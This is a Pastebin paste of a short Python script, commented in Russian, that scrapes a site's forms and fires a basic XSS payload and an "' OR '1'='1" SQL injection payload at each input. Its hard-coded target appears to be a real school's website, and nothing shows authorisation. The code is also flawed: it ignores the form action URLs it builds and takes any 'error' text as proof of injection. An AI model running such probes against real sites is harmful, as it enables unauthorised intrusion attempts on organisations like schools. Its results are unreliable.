Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import requests
- from bs4 import BeautifulSoup
- # Функция для проверки XSS уязвимости
- def check_xss(url, param):
- payload = "<script>alert('XSS')</script>"
- response = requests.get(url, params={param: payload})
- print(response.content)
- if payload in response.text:
- return True
- return False
- # Функция для проверки SQL-инъекции
- def check_sql_injection(url, param):
- payload = "' OR '1'='1"
- response = requests.get(url, params={param: payload})
- print(response.content)
- if "error" in response.text.lower():
- return True
- return False
- # Основная функция для проверки уязвимостей
- def check_vulnerabilities(url):
- try:
- response = requests.get(url)
- soup = BeautifulSoup(response.text, 'html.parser')
- # Извлечение всех форм
- forms = soup.find_all('form')
- for form in forms:
- action = form.get('action')
- if not action.startswith('http'):
- action = url + action
- inputs = form.find_all('input')
- for input_tag in inputs:
- input_name = input_tag.get('name')
- if input_name:
- # Проверка на XSS
- if check_xss(url, input_name):
- print(f"XSS уязвимость найдена в параметре: {input_name}")
- # Проверка на SQL-инъекцию
- if check_sql_injection(url, input_name):
- print(f"SQL-инъекция найдена в параметре: {input_name}")
- except Exception as e:
- print(f"Ошибка: {e}")
- # Пример использования
- if __name__ == "__main__":
- target_url = "https://школа12саров.рф/" # Замените на URL целевого веб-сайта
- check_vulnerabilities(target_url)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement